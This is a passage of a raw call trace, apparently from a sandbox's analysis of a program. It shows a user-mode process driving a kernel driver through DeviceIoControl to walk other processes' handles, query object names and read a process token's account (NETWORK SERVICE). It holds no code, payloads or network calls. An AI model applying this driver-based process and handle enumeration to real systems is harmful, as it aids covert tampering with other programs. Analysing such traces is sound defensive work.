ObfDereferenceObject (Object=0xffffe00069847830) returned 0x7ffe [0289.601] IoCompleteRequest () returned 0x0 [0289.601] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.601] PsAcquireProcessExitSynchronization () returned 0x0 [0289.601] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.601] ObReferenceObjectByHandle (in: Handle=0x594, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069845640, HandleInformation=0x0) returned 0x0 [0289.601] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.601] PsReleaseProcessExitSynchronization () returned 0x2 [0289.601] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78159 [0289.601] ObQueryNameString (in: Object=0xffffe00069845640, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.601] ObfDereferenceObject (Object=0xffffe00069845640) returned 0x7ffe [0289.601] IoCompleteRequest () returned 0x0 [0289.601] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.601] PsAcquireProcessExitSynchronization () returned 0x0 [0289.601] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.601] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698434a0, HandleInformation=0x0) returned 0x0 [0289.601] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.601] PsReleaseProcessExitSynchronization () returned 0x2 [0289.601] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78158 [0289.601] ObQueryNameString (in: Object=0xffffe000698434a0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.601] ObfDereferenceObject (Object=0xffffe000698434a0) returned 0x7ffe [0289.601] IoCompleteRequest () returned 0x0 [0289.601] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.601] PsAcquireProcessExitSynchronization () returned 0x0 [0289.601] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.601] ObReferenceObjectByHandle (in: Handle=0x59c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069844090, HandleInformation=0x0) returned 0x0 [0289.602] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.602] PsReleaseProcessExitSynchronization () returned 0x2 [0289.602] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78157 [0289.602] ObQueryNameString (in: Object=0xffffe00069844090, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.602] ObfDereferenceObject (Object=0xffffe00069844090) returned 0x7ffe [0289.602] IoCompleteRequest () returned 0x0 [0289.602] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.602] PsAcquireProcessExitSynchronization () returned 0x0 [0289.602] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.602] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069847ab0, HandleInformation=0x0) returned 0x0 [0289.602] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.602] PsReleaseProcessExitSynchronization () returned 0x2 [0289.602] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78156 [0289.602] ObQueryNameString (in: Object=0xffffe00069847ab0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.602] ObfDereferenceObject (Object=0xffffe00069847ab0) returned 0x7ffe [0289.602] IoCompleteRequest () returned 0x0 [0289.602] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.602] PsAcquireProcessExitSynchronization () returned 0x0 [0289.602] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.602] ObReferenceObjectByHandle (in: Handle=0x5a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069848090, HandleInformation=0x0) returned 0x0 [0289.602] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.602] PsReleaseProcessExitSynchronization () returned 0x2 [0289.602] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78155 [0289.602] ObQueryNameString (in: Object=0xffffe00069848090, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.602] ObfDereferenceObject (Object=0xffffe00069848090) returned 0x7ffe [0289.602] IoCompleteRequest () returned 0x0 [0289.602] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.602] PsAcquireProcessExitSynchronization () returned 0x0 [0289.602] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.602] ObReferenceObjectByHandle (in: Handle=0x648, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bf65b0, HandleInformation=0x0) returned 0x0 [0289.602] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.780] PsReleaseProcessExitSynchronization () returned 0x2 [0289.781] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78154 [0289.781] ObQueryNameString (in: Object=0xffffe00069bf65b0, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.781] ObfDereferenceObject (Object=0xffffe00069bf65b0) returned 0x7ffe [0289.781] IoCompleteRequest () returned 0x0 [0289.781] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.781] PsAcquireProcessExitSynchronization () returned 0x0 [0289.781] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.781] ObReferenceObjectByHandle (in: Handle=0x67c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069d96c00, HandleInformation=0x0) returned 0x0 [0289.781] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.781] PsReleaseProcessExitSynchronization () returned 0x2 [0289.781] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78153 [0289.781] ObQueryNameString (in: Object=0xffffe00069d96c00, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.781] ObfDereferenceObject (Object=0xffffe00069d96c00) returned 0x7ffe [0289.781] IoCompleteRequest () returned 0x0 [0289.781] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.781] PsAcquireProcessExitSynchronization () returned 0x0 [0289.781] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.781] ObReferenceObjectByHandle (in: Handle=0x774, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f534d0, HandleInformation=0x0) returned 0x0 [0289.781] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.781] PsReleaseProcessExitSynchronization () returned 0x2 [0289.781] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78152 [0289.781] ObQueryNameString (in: Object=0xffffe00069a2b060, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.781] ObfDereferenceObject (Object=0xffffe00069f534d0) returned 0x7fe8 [0289.781] IoCompleteRequest () returned 0x0 [0289.781] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.781] PsAcquireProcessExitSynchronization () returned 0x0 [0289.781] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.781] ObReferenceObjectByHandle (in: Handle=0x77c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f54090, HandleInformation=0x0) returned 0x0 [0289.781] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.781] PsReleaseProcessExitSynchronization () returned 0x2 [0289.781] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78151 [0289.781] ObQueryNameString (in: Object=0xffffe0006907e3f0, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.781] ObfDereferenceObject (Object=0xffffe00069f54090) returned 0x7cb3 [0289.781] IoCompleteRequest () returned 0x0 [0289.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x26c) returned 0x188 [0289.781] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.781] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000697bb840, HandleInformation=0x0) returned 0x0 [0289.781] ObOpenObjectByPointer (in: Object=0xffffe000697bb840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80001040) returned 0x0 [0289.781] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x48028 [0289.782] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80001040, DesiredAccess=0x8, TokenHandle=0xffffe000697c9800 | out: TokenHandle=0xffffe000697c9800*=0x18c) returned 0x0 [0289.782] ZwClose (Handle=0xffffffff80001040) returned 0x0 [0289.782] IoCompleteRequest () returned 0x0 [0289.782] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.782] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="NETWORK SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.783] CloseHandle (hObject=0x18c) returned 1 [0289.783] CloseHandle (hObject=0x188) returned 1 [0289.783] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.783] PsAcquireProcessExitSynchronization () returned 0x0 [0289.783] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.783] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b6520, HandleInformation=0x0) returned 0x0 [0289.783] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.783] PsReleaseProcessExitSynchronization () returned 0x2 [0289.783] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40026 [0289.783] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.783] ObfDereferenceObject (Object=0xffffe000697b6520) returned 0x7ffe [0289.783] IoCompleteRequest () returned 0x0 [0289.783] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.783] PsAcquireProcessExitSynchronization () returned 0x0 [0289.783] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.783] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697c4990, HandleInformation=0x0) returned 0x0 [0289.783] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.783] PsReleaseProcessExitSynchronization () returned 0x2 [0289.783] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40025 [0289.783] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.783] ObfDereferenceObject (Object=0xffffe000697c4990) returned 0x7ffe [0289.783] IoCompleteRequest () returned 0x0 [0289.783] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.783] PsAcquireProcessExitSynchronization () returned 0x0 [0289.783] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.783] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697be6c0, HandleInformation=0x0) returned 0x0 [0289.783] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.783] PsReleaseProcessExitSynchronization () returned 0x2 [0289.783] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40024 [0289.783] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.783] ObfDereferenceObject (Object=0xffffe000697be6c0) returned 0x7ffb [0289.783] IoCompleteRequest () returned 0x0 [0289.783] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.783] PsAcquireProcessExitSynchronization () returned 0x0 [0289.783] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.783] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697be240, HandleInformation=0x0) returned 0x0 [0289.783] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.783] PsReleaseProcessExitSynchronization () returned 0x2 [0289.784] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40023 [0289.784] ObQueryNameString (in: Object=0xffffe000697be240, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.784] ObfDereferenceObject (Object=0xffffe000697be240) returned 0x7ff2 [0289.784] IoCompleteRequest () returned 0x0 [0289.784] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.784] PsAcquireProcessExitSynchronization () returned 0x0 [0289.784] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.784] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697c1dd0, HandleInformation=0x0) returned 0x0 [0289.784] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.784] PsReleaseProcessExitSynchronization () returned 0x2 [0289.784] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40022 [0289.784] ObQueryNameString (in: Object=0xffffe000697c1dd0, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.784] ObfDereferenceObject (Object=0xffffe000697c1dd0) returned 0x7ffa [0289.784] IoCompleteRequest () returned 0x0 [0289.784] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.784] PsAcquireProcessExitSynchronization () returned 0x0 [0289.784] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.784] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697c5d00, HandleInformation=0x0) returned 0x0 [0289.784] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.784] PsReleaseProcessExitSynchronization () returned 0x2 [0289.784] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40021 [0289.784] ObQueryNameString (in: Object=0xffffe000697c5d00, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.784] ObfDereferenceObject (Object=0xffffe000697c5d00) returned 0x7ff4 [0289.784] IoCompleteRequest () returned 0x0 [0289.784] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.784] PsAcquireProcessExitSynchronization () returned 0x0 [0289.784] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.784] ObReferenceObjectByHandle (in: Handle=0x1cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697c5090, HandleInformation=0x0) returned 0x0 [0289.784] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.784] PsReleaseProcessExitSynchronization () returned 0x2 [0289.784] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40020 [0289.784] ObQueryNameString (in: Object=0xffffe000697c5090, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.784] ObfDereferenceObject (Object=0xffffe000697c5090) returned 0x7ffd [0289.784] IoCompleteRequest () returned 0x0 [0289.784] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.784] PsAcquireProcessExitSynchronization () returned 0x0 [0289.784] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.784] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697c5400, HandleInformation=0x0) returned 0x0 [0289.784] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.784] PsReleaseProcessExitSynchronization () returned 0x2 [0289.784] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4001f [0289.784] ObQueryNameString (in: Object=0xffffe000697c5400, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.784] ObfDereferenceObject (Object=0xffffe000697c5400) returned 0x7ffb [0289.784] IoCompleteRequest () returned 0x0 [0289.785] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.785] PsAcquireProcessExitSynchronization () returned 0x0 [0289.785] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.785] ObReferenceObjectByHandle (in: Handle=0x1f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697c7bf0, HandleInformation=0x0) returned 0x0 [0289.785] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.785] PsReleaseProcessExitSynchronization () returned 0x2 [0289.785] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4001e [0289.785] ObQueryNameString (in: Object=0xffffe000697c7bf0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.785] ObfDereferenceObject (Object=0xffffe000697c7bf0) returned 0x800e [0289.785] IoCompleteRequest () returned 0x0 [0289.785] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.785] PsAcquireProcessExitSynchronization () returned 0x0 [0289.785] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.785] ObReferenceObjectByHandle (in: Handle=0x1f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697c94d0, HandleInformation=0x0) returned 0x0 [0289.785] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.785] PsReleaseProcessExitSynchronization () returned 0x2 [0289.785] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4001d [0289.785] ObQueryNameString (in: Object=0xffffe000697c94d0, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.785] ObfDereferenceObject (Object=0xffffe000697c94d0) returned 0x7ff4 [0289.785] IoCompleteRequest () returned 0x0 [0289.785] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.785] PsAcquireProcessExitSynchronization () returned 0x0 [0289.786] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.786] ObReferenceObjectByHandle (in: Handle=0x200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697cbc60, HandleInformation=0x0) returned 0x0 [0289.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.786] PsReleaseProcessExitSynchronization () returned 0x2 [0289.786] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4001c [0289.786] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.786] ObfDereferenceObject (Object=0xffffe000697cbc60) returned 0x7ff8 [0289.786] IoCompleteRequest () returned 0x0 [0289.786] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.786] PsAcquireProcessExitSynchronization () returned 0x0 [0289.786] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.786] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697cf090, HandleInformation=0x0) returned 0x0 [0289.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.786] PsReleaseProcessExitSynchronization () returned 0x2 [0289.786] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4001b [0289.786] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.786] ObfDereferenceObject (Object=0xffffe000697cf090) returned 0x7ff0 [0289.786] IoCompleteRequest () returned 0x0 [0289.786] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.786] PsAcquireProcessExitSynchronization () returned 0x0 [0289.786] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.786] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697cf540, 